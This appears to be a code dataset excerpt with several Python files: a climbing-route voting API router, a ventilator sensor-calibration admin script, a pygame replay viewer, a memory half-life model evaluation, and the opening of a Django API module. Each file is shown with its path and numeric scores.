router, MainModel, vote_models = create_api_router(
model_name="Climbs",
collection_name="climbs",
item_name="climb",
statics=dict(
crag_id=UUID,
sector_id=UUID,
),
voted=[
VoteDefinition(
model_name="ClimbNameVote",
collection_name="name_votes",
item_name="name_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="RatingVote",
collection_name="rating_votes",
item_name="rating_vote",
type=conint(ge=0, le=5),
aggregation=VoteAggregation(
fn=average,
name="average_rating",
type=float,
),
),
VoteDefinition(
model_name="GradeVote",
collection_name="grade_votes",
item_name="grade_vote",
type=UUID,
aggregation=VoteAggregation(
fn=most_voted,
name="most_voted_grade",
type=UUID,
),
),
VoteDefinition(
model_name="ClimbTypeVote",
collection_name="climb_type_votes",
item_name="climb_type_vote",
type=ClimbType,
),
VoteDefinition(
model_name="SitStartVote",
collection_name="sit_start_votes",
item_name="sit_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="DefinedStartVote",
collection_name="defined_start_votes",
item_name="defined_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="EliminationsVote",
collection_name="eliminations_votes",
item_name="eliminations_vote",
type=constr(min_length=1, strip_whitespace=True), # TODO: draw area of eliminations?
),
VoteDefinition(
model_name="ClimbDescriptionVote",
collection_name="description_votes",
item_name="description_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="BrokenVote",
collection_name="broken_votes",
item_name="broken_vote",
type=bool,
),
# guide book grade?
# first ascent grade?
# point to other page with information?
# point to video + timestamp with beta
]
) | app/routers/climbs.py | from enum import Enum
from uuid import UUID
from pydantic.types import constr, conint
from app import create_api_router, VoteDefinition, VoteAggregation
def most_voted(mongo_votes):
values = dict()
for mongo_vote in mongo_votes:
if mongo_vote["value"] in values:
values[mongo_vote["value"]] += 1
else:
values[mongo_vote["value"]] = 1
return max(values, key=values.get, default=None)
def average(mongo_votes):
if len(mongo_votes) == 0:
return None
else:
return sum([mongo_vote["value"] for mongo_vote in mongo_votes]) / len(mongo_votes)
class ClimbType(str, Enum):
boulder = "boulder"
sport = "sport"
deep_water_solo = "deep_water_solo"
traditional = "traditional"
partially_bolted = "partially_bolted"
ice_or_mixed = "ice_or_mixed"
aid = "aid"
mountain = "mountain"
router, MainModel, vote_models = create_api_router(
model_name="Climbs",
collection_name="climbs",
item_name="climb",
statics=dict(
crag_id=UUID,
sector_id=UUID,
),
voted=[
VoteDefinition(
model_name="ClimbNameVote",
collection_name="name_votes",
item_name="name_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="RatingVote",
collection_name="rating_votes",
item_name="rating_vote",
type=conint(ge=0, le=5),
aggregation=VoteAggregation(
fn=average,
name="average_rating",
type=float,
),
),
VoteDefinition(
model_name="GradeVote",
collection_name="grade_votes",
item_name="grade_vote",
type=UUID,
aggregation=VoteAggregation(
fn=most_voted,
name="most_voted_grade",
type=UUID,
),
),
VoteDefinition(
model_name="ClimbTypeVote",
collection_name="climb_type_votes",
item_name="climb_type_vote",
type=ClimbType,
),
VoteDefinition(
model_name="SitStartVote",
collection_name="sit_start_votes",
item_name="sit_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="DefinedStartVote",
collection_name="defined_start_votes",
item_name="defined_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="EliminationsVote",
collection_name="eliminations_votes",
item_name="eliminations_vote",
type=constr(min_length=1, strip_whitespace=True), # TODO: draw area of eliminations?
),
VoteDefinition(
model_name="ClimbDescriptionVote",
collection_name="description_votes",
item_name="description_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="BrokenVote",
collection_name="broken_votes",
item_name="broken_vote",
type=bool,
),
# guide book grade?
# first ascent grade?
# point to other page with information?
# point to video + timestamp with beta
]
) | 0.390011 | 0.163179 |
# Admin script for managing vent
import time
import socket
import requests
import logging
from multiprocessing import Value
import board
import digitalio
from adafruit_motorkit import MotorKit
import rpi2c
from actuator import peep
from sensor import sensor
from sensor.sensor_d6f import FlowSensorD6F
from sensor.sensor_lps import PressureSensorLPS
from actuator.valve import Breather
g_hostname = socket.gethostname()
g_ip_address = socket.gethostbyname(g_hostname)
g_tune_url = "http://%s:3000/tune" % (g_ip_address,)
def admin_help():
print("Enter cmd")
print("[c] [percent] calibrate inspiratory flow with percent valve open")
print("[d] [percent] calibrate expiratory flow with percent valve open")
print("[t] [percent] set max percent solenoid open")
print("[x] [cross] set peep crossing threshold")
print("[y] [steps] set number of steps for peep")
print("[z] [seconds] set peep step time")
print("[o] [0|50|100] set precent oxygen mix")
print("[h] print this help screen")
print("[] to exit")
def admin_request(setting, value):
r = requests.post(g_tune_url, json={
setting:value
})
def flow_calibrate(bus, percent, count):
print("runing calibration on bus %d" % (bus,))
# setup pressure sensors and zero pressure them
in_p1 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5d)
in_p2 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5c)
ex_p1 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5d)
ex_p2 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5c)
sensor.pressure_zero(in_p1, in_p2, ex_p1, ex_p2)
flow = FlowSensorD6F(rpi2c.rpi_i2c(1))
kit = MotorKit(i2c=rpi2c.rpi_i2c(1))
breather = Breather(kit.motor1, kit.motor2)
ox = Value('i', 0)
if bus == 1:
p1 = in_p1
p2 = in_p2
else:
p1 = ex_p1
p2 = ex_p2
# open valve
breather.throttle(percent, ox)
total = 0
samples = 0
vmin = 100
vmax = 0
THRESH = 50
logging.warning("Start calibration")
for i in range(0,count):
p1.read()
p2.read()
flow.read()
r = flow.data.rate
hp = p2.data.pressure
lp = p1.data.pressure
if hp > (lp + THRESH):
vco = r / ((hp-lp)**0.5)
total += vco
samples += 1
vmin = min(vco, vmin)
vmax = max(vco, vmax)
logging.warning("%f %f %f %f" % (r, vco, hp, lp))
time.sleep(0.1)
# close valve
logging.warning("VCO: %f min %f max %f" % (total/samples, vmin, vmax))
breather.throttle(0, ox)
if __name__ == '__main__':
print("Connecting to vent @ %s" % (g_ip_address,))
admin_help()
while True:
try:
user = input()
if user == "":
break
if user == "h":
admin_help()
continue
(cmd, val) = user.split()
if cmd == "c":
flow_calibrate(1, int(val), 200)
elif cmd == "d":
flow_calibrate(3, int(val), 200)
elif cmd == "t":
admin_request("top", int(val))
elif cmd == "x":
admin_request("pcross", float(val))
elif cmd == "y":
admin_request("pstep", int(val))
elif cmd == "z":
admin_request("pstept", float(val))
elif cmd == "o":
admin_request("oxp", int(val))
except Exception as e:
print(e) | admin.py |
# Admin script for managing vent
import time
import socket
import requests
import logging
from multiprocessing import Value
import board
import digitalio
from adafruit_motorkit import MotorKit
import rpi2c
from actuator import peep
from sensor import sensor
from sensor.sensor_d6f import FlowSensorD6F
from sensor.sensor_lps import PressureSensorLPS
from actuator.valve import Breather
g_hostname = socket.gethostname()
g_ip_address = socket.gethostbyname(g_hostname)
g_tune_url = "http://%s:3000/tune" % (g_ip_address,)
def admin_help():
print("Enter cmd")
print("[c] [percent] calibrate inspiratory flow with percent valve open")
print("[d] [percent] calibrate expiratory flow with percent valve open")
print("[t] [percent] set max percent solenoid open")
print("[x] [cross] set peep crossing threshold")
print("[y] [steps] set number of steps for peep")
print("[z] [seconds] set peep step time")
print("[o] [0|50|100] set precent oxygen mix")
print("[h] print this help screen")
print("[] to exit")
def admin_request(setting, value):
r = requests.post(g_tune_url, json={
setting:value
})
def flow_calibrate(bus, percent, count):
print("runing calibration on bus %d" % (bus,))
# setup pressure sensors and zero pressure them
in_p1 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5d)
in_p2 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5c)
ex_p1 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5d)
ex_p2 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5c)
sensor.pressure_zero(in_p1, in_p2, ex_p1, ex_p2)
flow = FlowSensorD6F(rpi2c.rpi_i2c(1))
kit = MotorKit(i2c=rpi2c.rpi_i2c(1))
breather = Breather(kit.motor1, kit.motor2)
ox = Value('i', 0)
if bus == 1:
p1 = in_p1
p2 = in_p2
else:
p1 = ex_p1
p2 = ex_p2
# open valve
breather.throttle(percent, ox)
total = 0
samples = 0
vmin = 100
vmax = 0
THRESH = 50
logging.warning("Start calibration")
for i in range(0,count):
p1.read()
p2.read()
flow.read()
r = flow.data.rate
hp = p2.data.pressure
lp = p1.data.pressure
if hp > (lp + THRESH):
vco = r / ((hp-lp)**0.5)
total += vco
samples += 1
vmin = min(vco, vmin)
vmax = max(vco, vmax)
logging.warning("%f %f %f %f" % (r, vco, hp, lp))
time.sleep(0.1)
# close valve
logging.warning("VCO: %f min %f max %f" % (total/samples, vmin, vmax))
breather.throttle(0, ox)
if __name__ == '__main__':
print("Connecting to vent @ %s" % (g_ip_address,))
admin_help()
while True:
try:
user = input()
if user == "":
break
if user == "h":
admin_help()
continue
(cmd, val) = user.split()
if cmd == "c":
flow_calibrate(1, int(val), 200)
elif cmd == "d":
flow_calibrate(3, int(val), 200)
elif cmd == "t":
admin_request("top", int(val))
elif cmd == "x":
admin_request("pcross", float(val))
elif cmd == "y":
admin_request("pstep", int(val))
elif cmd == "z":
admin_request("pstept", float(val))
elif cmd == "o":
admin_request("oxp", int(val))
except Exception as e:
print(e) | 0.225331 | 0.211417 |
import datetime
import json
from math import ceil
from dev01_22_19.data.characters.base import *
from roengine.game.recording import RecordingPlayer
class CustomPlayer(RecordingPlayer):
def apply_packet(self, packet, actual_time, expected_time):
bullets._bullets = pygame.sprite.Group(*[DummyBullet(i, self.game.bul_pics) for i in packet['bullets']])
self.game.players = pygame.sprite.Group(*[DummyPlayer(i, self.game.pic) for i in packet['players']])
self.game.player.score = packet['score']
self.game.player.rect.center = packet['pos']
self.game.player.health = packet['hp']
self.game.player.shield = packet['sh']
self.game.player.update_pos()
self.game.player.rotation = packet['rot']
self.game.player.image = pygame.transform.rotozoom(self.game.player.master_image, packet['rot'],
self.game.player.ZOOM)
self.game.player.mode = 'weapon' if packet['item'][0] == 'w' else 'ability'
if self.game.player.mode == 'weapon':
self.game.player.weapon = self.game.player.inv[packet['item'][1:]]
self.game.weapon_txt.update_text("Item: " + str(self.game.player.weapon))
self.game.player.weapon.ammo = packet['ammo']
self.game.reload_txt.update_text("%.1f" % packet["reload_prog"])
if self.game.player.mode == 'ability':
self.game.player.ability = self.game.player.abilities[packet['item'][1:]]
self.game.ammo_txt.update_text("%.1f" % packet['action_dur'])
self.game.reload_txt.update_text("%.1f" % packet["action_cool"])
self.game.weapon_txt.update_text("Ability: " + str(self.game.player.ability))
class DummyPlayer(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot = args
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['player'])
class DummyBullet(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot, self.type = args
pygame.sprite.Sprite.__init__(self)
self.image = image[self.type]
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['bullets'][self.type])
def fmtdeltatime(time):
ret = [0, 0, 0, str(time % 1)[2:]]
for i in range(2, -1, -1):
ret[i] = int(time % 60)
time = int(time / 60)
return "%.2i:%.2i:%.2i.%s" % tuple(ret)
class ReplayPlayerApp(Game):
def start(self):
self.replay = CustomPlayer(self)
self.replay.set_speed(1)
self.replay.start()
msg = self.replay.from_file("/Users/Grant/Downloads/latest.replay")
# print msg
print ("===================[NOW PLAYING: /Users/Grant/Downloads/latest.replay]====================")
print ("Created: %s" % datetime.datetime.fromtimestamp(msg['start']))
print ("Length: %s" % fmtdeltatime(msg['len']))
pygame.init()
self.screen = pygame.display.set_mode([640, 480], RESIZABLE)
self.map = Map([1500, 500])
sheet = pygame.image.load("./data/sprites/Player.png").convert_alpha()
self.pic = from_spritesheet([0, 0, 32, 32], sheet)
self.bul_pics = [from_spritesheet([32, 96, 32, 32], sheet), from_spritesheet([0, 96, 32, 32], sheet)]
self.hud_layer = Map([960, 720])
self.player = BasicCharacter(self)
self.player.update()
self.players = pygame.sprite.Group()
with open("./data/maps/%s.json" % msg['map'], 'r') as fp:
map_json = json.load(fp)
self.TEST_MAP = pygame.sprite.Group()
for i in map_json['blocks']:
self.TEST_MAP.add(Obstacle(i['size'], i['pos'], 1, i['color']))
self.background_col = map_json['background']['color']
self.spawn_locs = map_json['spawns']
self.clear_surf = pygame.Surface(HUD_RES, SRCALPHA, 32).convert_alpha()
self.hp_bar = ProgressBar((0, self.player.max_hp), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((255, 0, 0), (128, 128, 128)))
self.hp_bar.rect.center = HUD_RES[0] / 2, 15
self.sh_bar = ProgressBar((0, self.player.max_shield[0]), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((0, 0, 255), (128, 128, 128)))
self.sh_bar.rect.center = HUD_RES[0] / 2, 40
self.reload_progress = self.player.action_manager.action_duration - self.player.action_manager.progress
self.reload_txt = Text(str(self.reload_progress)[:3], bg=(255, 255, 255))
self.reload_txt.rect.right = HUD_RES[0] - 100
self.reload_txt.rect.centery = 65
self.weapon_txt = Text("Item: " + str(self.player.weapon), bg=(255, 255, 255))
self.weapon_txt.rect.center = HUD_RES[0] / 2, 65
self.debug_txt = Text("Ping: 0 | Recv: 0 | Send: 0", bg=(255, 255, 255))
self.debug_txt.rect.centerx = HUD_RES[0] / 2
self.debug_txt.rect.bottom = HUD_RES[1] - 5
self.hp_txt = Text("Health: " + str(self.player.health))
self.hp_txt.rect.center = self.hp_bar.rect.center
self.sh_txt = Text("Shield: 100")
self.sh_txt.rect.center = self.sh_bar.rect.center
self.kill_txt = Text("Score: 0", bg=(255, 255, 255))
self.kill_txt.rect.center = HUD_RES[0] / 2, 87
self.ammo_txt = Text(str(self.player.weapon.ammo) + '/inf', bg=(255, 255, 255))
self.ammo_txt.rect.left = 100
self.ammo_txt.rect.centery = 65
self.running = True
def tick_main(self):
self.replay.update()
# self.player.update(False, is_replay=True)
self.player.action_manager.tick()
self.player.weapon.tick()
self.hp_bar.val = self.player.health
self.sh_bar.val = self.player.shield
self.hp_bar.update()
self.sh_bar.update()
self.sh_txt.update_text("Shield: %i" % ceil(self.player.shield))
self.hp_txt.update_text("Health: %i" % ceil(self.player.health))
self.kill_txt.update_text("Score: %i" % ceil(self.player.score))
if self.player.mode == 'weapon':
#self.weapon_txt.update_text("Item: " + str(self.player.weapon))
#self.reload_progress = "%.1f" % \
# (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.reload_txt.update_text(self.reload_progress)
self.ammo_txt.update_text(str(self.player.weapon.ammo) + '/inf')
else:
pass # moved into replay player
#self.weapon_txt.update_text("Ability: " + str(self.player.ability))
#self.reload_txt.update_text("%.1f" % self.player.ability.get_cooldown())
#action_dur = "%.1f" % (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.ammo_txt.update_text(action_dur)
self.screen.fill([255, 255, 255])
self.hud_layer._map = self.clear_surf.copy()
self.hud_layer.draw_group(buttons.visible_bts)
self.hud_layer.draw_sprite(self.kill_txt)
self.hud_layer.draw_sprite(self.hp_bar)
self.hud_layer.draw_sprite(self.hp_txt)
self.hud_layer.draw_sprite(self.sh_bar)
self.hud_layer.draw_sprite(self.sh_txt)
if self.ammo_txt.text != '0.0':
self.hud_layer.draw_sprite(self.ammo_txt)
self.hud_layer.draw_sprite(self.weapon_txt)
if self.reload_txt.text != '0.0':
self.hud_layer.draw_sprite(self.reload_txt)
self.map.fill(self.background_col)
self.map.draw_group(bullets.get_group())
self.map.draw_group(self.TEST_MAP)
self.map.draw_sprite(self.player)
self.map.draw_group(self.players)
self.map.get_scroll(self.player.rect.center, self.screen, (self.screen.get_width() / 2,
self.screen.get_height() / 2), (True, True))
self.map.scale_to(self.screen, MAP_ZOOM)
self.map.blit_to(self.screen)
self.hud_layer.scale_to(self.screen, [1, 1])
self.hud_layer.blit_to(self.screen)
pygame.display.flip()
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_RIGHT:
self.replay.set_speed(self.replay.speed+0.5)
print self.replay.speed
if event.key == K_LEFT:
self.replay.set_speed(self.replay.speed-0.5)
print self.replay.speed
if event.type == VIDEORESIZE:
self.screen = pygame.display.set_mode(event.dict['size'], RESIZABLE)
if event.type == QUIT:
self.terminate()
def stop(self):
pygame.quit()
self.running = False
if __name__ == "__main__":
game = ReplayPlayerApp()
game.load()
reactor.run() | dev01_22_19/replay_player.py | import datetime
import json
from math import ceil
from dev01_22_19.data.characters.base import *
from roengine.game.recording import RecordingPlayer
class CustomPlayer(RecordingPlayer):
def apply_packet(self, packet, actual_time, expected_time):
bullets._bullets = pygame.sprite.Group(*[DummyBullet(i, self.game.bul_pics) for i in packet['bullets']])
self.game.players = pygame.sprite.Group(*[DummyPlayer(i, self.game.pic) for i in packet['players']])
self.game.player.score = packet['score']
self.game.player.rect.center = packet['pos']
self.game.player.health = packet['hp']
self.game.player.shield = packet['sh']
self.game.player.update_pos()
self.game.player.rotation = packet['rot']
self.game.player.image = pygame.transform.rotozoom(self.game.player.master_image, packet['rot'],
self.game.player.ZOOM)
self.game.player.mode = 'weapon' if packet['item'][0] == 'w' else 'ability'
if self.game.player.mode == 'weapon':
self.game.player.weapon = self.game.player.inv[packet['item'][1:]]
self.game.weapon_txt.update_text("Item: " + str(self.game.player.weapon))
self.game.player.weapon.ammo = packet['ammo']
self.game.reload_txt.update_text("%.1f" % packet["reload_prog"])
if self.game.player.mode == 'ability':
self.game.player.ability = self.game.player.abilities[packet['item'][1:]]
self.game.ammo_txt.update_text("%.1f" % packet['action_dur'])
self.game.reload_txt.update_text("%.1f" % packet["action_cool"])
self.game.weapon_txt.update_text("Ability: " + str(self.game.player.ability))
class DummyPlayer(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot = args
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['player'])
class DummyBullet(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot, self.type = args
pygame.sprite.Sprite.__init__(self)
self.image = image[self.type]
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['bullets'][self.type])
def fmtdeltatime(time):
ret = [0, 0, 0, str(time % 1)[2:]]
for i in range(2, -1, -1):
ret[i] = int(time % 60)
time = int(time / 60)
return "%.2i:%.2i:%.2i.%s" % tuple(ret)
class ReplayPlayerApp(Game):
def start(self):
self.replay = CustomPlayer(self)
self.replay.set_speed(1)
self.replay.start()
msg = self.replay.from_file("/Users/Grant/Downloads/latest.replay")
# print msg
print ("===================[NOW PLAYING: /Users/Grant/Downloads/latest.replay]====================")
print ("Created: %s" % datetime.datetime.fromtimestamp(msg['start']))
print ("Length: %s" % fmtdeltatime(msg['len']))
pygame.init()
self.screen = pygame.display.set_mode([640, 480], RESIZABLE)
self.map = Map([1500, 500])
sheet = pygame.image.load("./data/sprites/Player.png").convert_alpha()
self.pic = from_spritesheet([0, 0, 32, 32], sheet)
self.bul_pics = [from_spritesheet([32, 96, 32, 32], sheet), from_spritesheet([0, 96, 32, 32], sheet)]
self.hud_layer = Map([960, 720])
self.player = BasicCharacter(self)
self.player.update()
self.players = pygame.sprite.Group()
with open("./data/maps/%s.json" % msg['map'], 'r') as fp:
map_json = json.load(fp)
self.TEST_MAP = pygame.sprite.Group()
for i in map_json['blocks']:
self.TEST_MAP.add(Obstacle(i['size'], i['pos'], 1, i['color']))
self.background_col = map_json['background']['color']
self.spawn_locs = map_json['spawns']
self.clear_surf = pygame.Surface(HUD_RES, SRCALPHA, 32).convert_alpha()
self.hp_bar = ProgressBar((0, self.player.max_hp), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((255, 0, 0), (128, 128, 128)))
self.hp_bar.rect.center = HUD_RES[0] / 2, 15
self.sh_bar = ProgressBar((0, self.player.max_shield[0]), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((0, 0, 255), (128, 128, 128)))
self.sh_bar.rect.center = HUD_RES[0] / 2, 40
self.reload_progress = self.player.action_manager.action_duration - self.player.action_manager.progress
self.reload_txt = Text(str(self.reload_progress)[:3], bg=(255, 255, 255))
self.reload_txt.rect.right = HUD_RES[0] - 100
self.reload_txt.rect.centery = 65
self.weapon_txt = Text("Item: " + str(self.player.weapon), bg=(255, 255, 255))
self.weapon_txt.rect.center = HUD_RES[0] / 2, 65
self.debug_txt = Text("Ping: 0 | Recv: 0 | Send: 0", bg=(255, 255, 255))
self.debug_txt.rect.centerx = HUD_RES[0] / 2
self.debug_txt.rect.bottom = HUD_RES[1] - 5
self.hp_txt = Text("Health: " + str(self.player.health))
self.hp_txt.rect.center = self.hp_bar.rect.center
self.sh_txt = Text("Shield: 100")
self.sh_txt.rect.center = self.sh_bar.rect.center
self.kill_txt = Text("Score: 0", bg=(255, 255, 255))
self.kill_txt.rect.center = HUD_RES[0] / 2, 87
self.ammo_txt = Text(str(self.player.weapon.ammo) + '/inf', bg=(255, 255, 255))
self.ammo_txt.rect.left = 100
self.ammo_txt.rect.centery = 65
self.running = True
def tick_main(self):
self.replay.update()
# self.player.update(False, is_replay=True)
self.player.action_manager.tick()
self.player.weapon.tick()
self.hp_bar.val = self.player.health
self.sh_bar.val = self.player.shield
self.hp_bar.update()
self.sh_bar.update()
self.sh_txt.update_text("Shield: %i" % ceil(self.player.shield))
self.hp_txt.update_text("Health: %i" % ceil(self.player.health))
self.kill_txt.update_text("Score: %i" % ceil(self.player.score))
if self.player.mode == 'weapon':
#self.weapon_txt.update_text("Item: " + str(self.player.weapon))
#self.reload_progress = "%.1f" % \
# (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.reload_txt.update_text(self.reload_progress)
self.ammo_txt.update_text(str(self.player.weapon.ammo) + '/inf')
else:
pass # moved into replay player
#self.weapon_txt.update_text("Ability: " + str(self.player.ability))
#self.reload_txt.update_text("%.1f" % self.player.ability.get_cooldown())
#action_dur = "%.1f" % (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.ammo_txt.update_text(action_dur)
self.screen.fill([255, 255, 255])
self.hud_layer._map = self.clear_surf.copy()
self.hud_layer.draw_group(buttons.visible_bts)
self.hud_layer.draw_sprite(self.kill_txt)
self.hud_layer.draw_sprite(self.hp_bar)
self.hud_layer.draw_sprite(self.hp_txt)
self.hud_layer.draw_sprite(self.sh_bar)
self.hud_layer.draw_sprite(self.sh_txt)
if self.ammo_txt.text != '0.0':
self.hud_layer.draw_sprite(self.ammo_txt)
self.hud_layer.draw_sprite(self.weapon_txt)
if self.reload_txt.text != '0.0':
self.hud_layer.draw_sprite(self.reload_txt)
self.map.fill(self.background_col)
self.map.draw_group(bullets.get_group())
self.map.draw_group(self.TEST_MAP)
self.map.draw_sprite(self.player)
self.map.draw_group(self.players)
self.map.get_scroll(self.player.rect.center, self.screen, (self.screen.get_width() / 2,
self.screen.get_height() / 2), (True, True))
self.map.scale_to(self.screen, MAP_ZOOM)
self.map.blit_to(self.screen)
self.hud_layer.scale_to(self.screen, [1, 1])
self.hud_layer.blit_to(self.screen)
pygame.display.flip()
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_RIGHT:
self.replay.set_speed(self.replay.speed+0.5)
print self.replay.speed
if event.key == K_LEFT:
self.replay.set_speed(self.replay.speed-0.5)
print self.replay.speed
if event.type == VIDEORESIZE:
self.screen = pygame.display.set_mode(event.dict['size'], RESIZABLE)
if event.type == QUIT:
self.terminate()
def stop(self):
pygame.quit()
self.running = False
if __name__ == "__main__":
game = ReplayPlayerApp()
game.load()
reactor.run() | 0.25174 | 0.201754 |
import time
import pandas as pd
from model.utils import *
def dhp(line, h, d):
recall = int(line[0])
interval = int(line[1])
if recall == 1:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_recall_halflife(d, h, p_recall)
else:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_forget_halflife(d, h, p_recall)
d = min(d + 2, 18)
return h, d
def eval(testset, repeat, fold):
record = pd.DataFrame(
columns=['difficulty', 'r_history', 't_history',
't',
'h', 'hh', 'h_loss', 'p', 'pp', 'p_loss', 'total_cnt'])
p_loss = 0
h_loss = 0
count = 0
for idx, line in testset.iterrows():
line_tensor = lineToTensor(list(
zip([line['r_history']], [line['t_history']]))[0])
ph = 0
d = line['difficulty']
for j in range(line_tensor.size()[0]):
ph, d = dhp(line_tensor[j][0], ph, d)
# print(f'model: {m}\tsample: {line}\tcorrect: {interval}\tpredict: {float(output)}')
pp = np.power(2, -line['delta_t'] / ph)
p = line['p_recall']
p_loss += abs(p - pp) * line['total_cnt']
h = line['halflife']
h_loss += abs((ph - h) / h) * line['total_cnt']
count += line['total_cnt']
record = pd.concat([record, pd.DataFrame(
{'difficulty': [line['difficulty']],
'r_history': [line['r_history']],
't_history': [line['t_history']],
't': [line['delta_t']], 'h': [h],
'hh': [round(ph, 2)], 'p': [p],
'pp': [round(pp, 3)], 'p_loss': [round(abs(p - pp), 3)], 'h_loss': [round(abs((ph - h) / h), 3)],
'total_cnt': [line['total_cnt']]})],
ignore_index=True)
print(f"model: dhp")
print(f'sample num: {count}')
print(f"avg p loss: {p_loss / count}")
print(f"avg h loss: {h_loss / count}")
record.to_csv(f'./fit_result/dhp/repeat{repeat}_fold{fold}_{int(time.time())}.csv', index=False) | model/dhp.py | import time
import pandas as pd
from model.utils import *
def dhp(line, h, d):
recall = int(line[0])
interval = int(line[1])
if recall == 1:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_recall_halflife(d, h, p_recall)
else:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_forget_halflife(d, h, p_recall)
d = min(d + 2, 18)
return h, d
def eval(testset, repeat, fold):
record = pd.DataFrame(
columns=['difficulty', 'r_history', 't_history',
't',
'h', 'hh', 'h_loss', 'p', 'pp', 'p_loss', 'total_cnt'])
p_loss = 0
h_loss = 0
count = 0
for idx, line in testset.iterrows():
line_tensor = lineToTensor(list(
zip([line['r_history']], [line['t_history']]))[0])
ph = 0
d = line['difficulty']
for j in range(line_tensor.size()[0]):
ph, d = dhp(line_tensor[j][0], ph, d)
# print(f'model: {m}\tsample: {line}\tcorrect: {interval}\tpredict: {float(output)}')
pp = np.power(2, -line['delta_t'] / ph)
p = line['p_recall']
p_loss += abs(p - pp) * line['total_cnt']
h = line['halflife']
h_loss += abs((ph - h) / h) * line['total_cnt']
count += line['total_cnt']
record = pd.concat([record, pd.DataFrame(
{'difficulty': [line['difficulty']],
'r_history': [line['r_history']],
't_history': [line['t_history']],
't': [line['delta_t']], 'h': [h],
'hh': [round(ph, 2)], 'p': [p],
'pp': [round(pp, 3)], 'p_loss': [round(abs(p - pp), 3)], 'h_loss': [round(abs((ph - h) / h), 3)],
'total_cnt': [line['total_cnt']]})],
ignore_index=True)
print(f"model: dhp")
print(f'sample num: {count}')
print(f"avg p loss: {p_loss / count}")
print(f"avg h loss: {h_loss / count}")
record.to_csv(f'./fit_result/dhp/repeat{repeat}_fold{fold}_{int(time.time())}.csv', index=False) | 0.296145 | 0.240273 |
import logging
import platform
import sched, threading
import subprocess
from django.http import HttpResponseForbidden
from django.http.request import QueryDict
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from utils import Status
from utils.typecheck import ensure_type
import utils.path as up
from server.utils import StatusResponse
from .models import (
Slave as SlaveModel,
Program as ProgramModel,
Script as ScriptModel,
Filesystem as FilesystemModel,
ScriptGraphFiles as SGFModel,
ScriptGraphPrograms as SGPModel,
)
from .scripts import Script
from .forms import SlaveForm, ProgramForm, FilesystemForm
from .errors import (
FsimError,
SlaveNotExistError,
ProgramNotExistError,
FilesystemNotExistError,
SimultaneousQueryError,
ScriptRunningError,
ScriptNotExistError,
)
from frontend import controller
from .controller import (
prog_start,
prog_stop,
fs_delete,
fs_move,
fs_restore,
prog_log_disable,
prog_log_enable,
prog_log_get,
script_deep_copy,
slave_wake_on_lan,
)
LOGGER = logging.getLogger("fsim.api")
def script_put_post(data, script_id):
"""
This functions removes code duplication for `script_entry` and
`script_set`. The logic for the PUT and POST method inside these functions
are identical. For more information take a look at `script_entry` or
`script_set`
"""
try:
script = Script.from_json(data)
if script_id is None:
script.save()
else:
(new_model, _) = ScriptModel.objects.update_or_create(
id=script_id,
defaults={"name": script.name},
)
SGFModel.objects.filter(script_id=script_id).delete()
SGPModel.objects.filter(script_id=script_id).delete()
for program in script.programs:
program.save(new_model)
for filesystem in script.filesystems:
filesystem.save(new_model)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except KeyError as err:
return StatusResponse.err("Could not find required key {}".format(
err.args[0]))
except TypeError as err:
return StatusResponse.err(str(err))
except ValueError as err:
return StatusResponse.err(str(err))
except ValidationError as err:
return StatusResponse.err('; '.join(err.messages))
except IntegrityError as err:
return StatusResponse.err(str(err))
def convert_str_to_bool(string):
"""
Converts a string into a boolean by checking common patterns. If no
pattern is matching the default (False) is returned. Common string patterns
are for the boolean true are on of ('yes', 'true', '1', 't', 'y').
Parameters
----------
string: str
The string which will be converted.
Returns
-------
bool:
If one of the patterns was found in the string.
Raises
------
TypeError:
If string is not a str instance.
"""
